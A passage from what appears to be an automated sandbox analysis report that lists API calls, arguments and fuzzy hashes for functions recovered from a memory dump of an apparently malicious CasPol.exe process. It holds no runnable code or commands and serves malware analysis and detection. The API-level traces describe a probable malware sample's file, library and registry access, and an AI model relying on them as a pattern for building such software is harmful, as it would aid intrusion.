                                                                                                                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                                                                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1381354015-0
                                                                                                                                                                                                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                                    • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2154303073-0
                                                                                                                                                                                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                                                    • Opcode ID: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Memory Dump Source
